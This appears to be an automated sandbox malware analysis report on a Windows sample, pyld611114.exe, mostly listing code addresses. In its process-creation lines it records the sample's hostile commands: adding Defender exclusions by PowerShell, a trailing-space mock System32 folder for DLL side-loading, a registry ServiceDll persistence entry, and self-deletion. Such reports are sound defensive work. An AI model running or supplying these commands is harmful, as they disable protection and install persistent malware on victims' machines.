Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361B95042_2_00007FFDA361B950
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360C03042_2_00007FFDA360C030
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363202042_2_00007FFDA3632020
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3667FE042_2_00007FFDA3667FE0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362DEA042_2_00007FFDA362DEA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3675E8042_2_00007FFDA3675E80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3679CC142_2_00007FFDA3679CC1
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3681D3042_2_00007FFDA3681D30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36E8D7042_2_00007FFDA36E8D70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36E344042_2_00007FFDA36E3440
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36D6AE042_2_00007FFDA36D6AE0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36F08B042_2_00007FFDA36F08B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36EE8E042_2_00007FFDA36EE8E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36EE82042_2_00007FFDA36EE820
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36EDF0042_2_00007FFDA36EDF00
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA378278042_2_00007FFDA3782780
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA377B47042_2_00007FFDA377B470
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3732B2042_2_00007FFDA3732B20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA378BA8642_2_00007FFDA378BA86
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3751AC042_2_00007FFDA3751AC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3737EE042_2_00007FFDA3737EE0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA377F43042_2_00007FFDA377F430
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA374238042_2_00007FFDA3742380
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA375E3C042_2_00007FFDA375E3C0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA08A6045_2_00007FF71FA08A60
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA380A445_2_00007FF71FA380A4
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA100F045_2_00007FF71FA100F0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA0688045_2_00007FF71FA06880
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA367EC45_2_00007FF71FA367EC
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA2B79445_2_00007FF71FA2B794
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA3376445_2_00007FF71FA33764
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA01E4045_2_00007FF71FA01E40
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA19DB045_2_00007FF71FA19DB0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA385FC45_2_00007FF71FA385FC
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA1755045_2_00007FF71FA17550
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA28BC845_2_00007FF71FA28BC8
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA1DC1045_2_00007FF71FA1DC10
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA123F045_2_00007FF71FA123F0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA10AB045_2_00007FF71FA10AB0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA352A045_2_00007FF71FA352A0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA0630045_2_00007FF71FA06300
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA05A7045_2_00007FF71FA05A70
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA3226045_2_00007FF71FA32260
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA201B845_2_00007FF71FA201B8
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA291DC45_2_00007FF71FA291DC
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA2A93445_2_00007FF71FA2A934
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA377F43045_2_00007FFDA377F430
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA374238045_2_00007FFDA3742380
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA375E3C045_2_00007FFDA375E3C0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA374118045_2_00007FFDA3741180
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378318045_2_00007FFDA3783180
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA37401D045_2_00007FFDA37401D0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378278045_2_00007FFDA3782780
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA377B79045_2_00007FFDA377B790
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA373D66045_2_00007FFDA373D660
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA376666045_2_00007FFDA3766660
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA37676B045_2_00007FFDA37676B0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA374261045_2_00007FFDA3742610
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA374C62045_2_00007FFDA374C620
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378857045_2_00007FFDA3788570
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA37784F045_2_00007FFDA37784F0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378453045_2_00007FFDA3784530
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA377B47045_2_00007FFDA377B470
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA37684C045_2_00007FFDA37684C0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3766C3E45_2_00007FFDA3766C3E
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3732B2045_2_00007FFDA3732B20
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378BA8645_2_00007FFDA378BA86
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA376BA8045_2_00007FFDA376BA80
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3751AC045_2_00007FFDA3751AC0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3737EE045_2_00007FFDA3737EE0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3768E6045_2_00007FFDA3768E60
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3775D0045_2_00007FFDA3775D00
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCD3C1876_2_00007FF60CCD3C18
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8718076_2_00007FF60CC87180
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCEDB476_2_00007FF60CCCEDB4
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC94DA076_2_00007FF60CC94DA0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA7EC076_2_00007FF60CCA7EC0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCC4E7C76_2_00007FF60CCC4E7C
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCBEE4C76_2_00007FF60CCBEE4C
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA8FD876_2_00007FF60CCA8FD8
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCC00F876_2_00007FF60CCC00F8
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCBF05076_2_00007FF60CCBF050
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCCA0076_2_00007FF60CCCCA00
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA898076_2_00007FF60CCA8980
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC98AA076_2_00007FF60CC98AA0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC9ABD076_2_00007FF60CC9ABD0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8CBC076_2_00007FF60CC8CBC0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCBBF076_2_00007FF60CCCBBF0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCC3B7876_2_00007FF60CCC3B78
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA8B9676_2_00007FF60CCA8B96
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCB2B5876_2_00007FF60CCB2B58
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCAC8476_2_00007FF60CCCAC84
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC9A5C076_2_00007FF60CC9A5C0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCD56876_2_00007FF60CCCD568
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8671076_2_00007FF60CC86710
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCD36C076_2_00007FF60CCD36C0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCC167C76_2_00007FF60CCC167C
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8582076_2_00007FF60CC85820
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCAA7F076_2_00007FF60CCAA7F0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCA7EC76_2_00007FF60CCCA7EC
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA879076_2_00007FF60CCA8790
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCC11F876_2_00007FF60CCC11F8
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC941E076_2_00007FF60CC941E0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8619076_2_00007FF60CC86190
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCD030076_2_00007FF60CCD0300
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCB2FC76_2_00007FF60CCCB2FC
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8C2B076_2_00007FF60CC8C2B0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8D2B076_2_00007FF60CC8D2B0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA825076_2_00007FF60CCA8250
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCBF25476_2_00007FF60CCBF254
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA925876_2_00007FF60CCA9258
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC9A3E076_2_00007FF60CC9A3E0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EB718083_2_00007FF7D6EB7180
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6F03C1883_2_00007FF7D6F03C18
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EDA7F083_2_00007FF7D6EDA7F0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFA7EC83_2_00007FF7D6EFA7EC
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED879083_2_00007FF7D6ED8790
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EB582083_2_00007FF7D6EB5820
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ECA5C083_2_00007FF7D6ECA5C0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFD56883_2_00007FF7D6EFD568
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EB671083_2_00007FF7D6EB6710
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6F036C083_2_00007FF7D6F036C0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EF167C83_2_00007FF7D6EF167C
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ECA3E083_2_00007FF7D6ECA3E0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EF11F883_2_00007FF7D6EF11F8
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EC41E083_2_00007FF7D6EC41E0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EB619083_2_00007FF7D6EB6190
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6F0030083_2_00007FF7D6F00300
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFB2FC83_2_00007FF7D6EFB2FC
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EBC2B083_2_00007FF7D6EBC2B0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EBD2B083_2_00007FF7D6EBD2B0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED925883_2_00007FF7D6ED9258
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EEF25483_2_00007FF7D6EEF254
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED825083_2_00007FF7D6ED8250
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED8FD883_2_00007FF7D6ED8FD8
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EF00F883_2_00007FF7D6EF00F8
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EEF05083_2_00007FF7D6EEF050
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFEDB483_2_00007FF7D6EFEDB4
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EC4DA083_2_00007FF7D6EC4DA0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED7EC083_2_00007FF7D6ED7EC0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EF4E7C83_2_00007FF7D6EF4E7C
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EEEE4C83_2_00007FF7D6EEEE4C
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFBBF083_2_00007FF7D6EFBBF0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ECABD083_2_00007FF7D6ECABD0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EBCBC083_2_00007FF7D6EBCBC0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED8B9683_2_00007FF7D6ED8B96
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EF3B7883_2_00007FF7D6EF3B78
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EE2B5883_2_00007FF7D6EE2B58
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFAC8483_2_00007FF7D6EFAC84
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFCA0083_2_00007FF7D6EFCA00
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED898083_2_00007FF7D6ED8980
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EC8AA083_2_00007FF7D6EC8AA0
Source: Joe Sandbox ViewDropped File: C:\Windows \System32\printui.dll 397A1DD2D8DCDE26F5D22AE33AFBF6C6201920F8D27EE213B65896FE99944239
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA36F1AB0 appears 77 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA368E0FE appears 63 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA37430A0 appears 104 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA368E27E appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA368E278 appears 32 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA3743190 appears 66 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA36F76EA appears 38 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA368E1CA appears 1339 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA368E8A2 appears 128 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA368E926 appears 36 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA3648FD0 appears 105 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA368E10A appears 59 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA368E104 appears 461 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA368EDF0 appears 844 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA368E896 appears 148 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA36E2C50 appears 63 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA36E2D70 appears 260 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA36E2CD0 appears 48 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA3638330 appears 65 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA36383C0 appears 71 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA3779870 appears 35 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA37430A0 appears 445 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF71FA06FF0 appears 50 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA3743190 appears 327 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA3761800 appears 42 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA3761920 appears 39 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA37703F0 appears 47 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA37798E0 appears 82 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA37432A0 appears 47 times
Source: libintl-9.dll.27.drStatic PE information: Number of sections : 20 > 10
Source: libiconv-2.dll.27.drStatic PE information: Number of sections : 20 > 10
Source: libwinpthread-1.dll.27.drStatic PE information: Number of sections : 12 > 10
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcurl.dllB vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNamelibpq.dll6 vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWinPthreadGCp( vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibsslH vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameiconv.dllv+ vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevcruntime140d.dll^ vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameintl.dllp( vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameiconv.dllv+ vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevcruntime140d.dll^ vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameintl.dllp( vs pyld611114.exe
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs pyld611114.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f
Source: classification engineClassification label: mal100.evad.winEXE@125/51@4/5
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36F59C0 GetFileAttributesA,GetLastError,_errno,CreateFileA,GetLastError,DeviceIoControl,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,_errno,CloseHandle,WideCharToMultiByte,_errno,isalpha,memcpy,42_2_00007FFDA36F59C0
Source: C:\Windows\System32\crypti.exeFile created: C:\Users\Public\tmp.enc
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6648:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:796:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:716:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1664:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2268:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2612:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5w0z5r2.cfz.ps1Jump to behavior
Source: pyld611114.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pyld611114.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: pyld611114.exeReversingLabs: Detection: 76%
Source: svchost.exeString found in binary or memory: -start
Source: svchost.exeString found in binary or memory: -addr
Source: svchost.exeString found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
Source: unknownProcess created: C:\Users\user\Desktop\pyld611114.exe "C:\Users\user\Desktop\pyld611114.exe"
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld611114.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
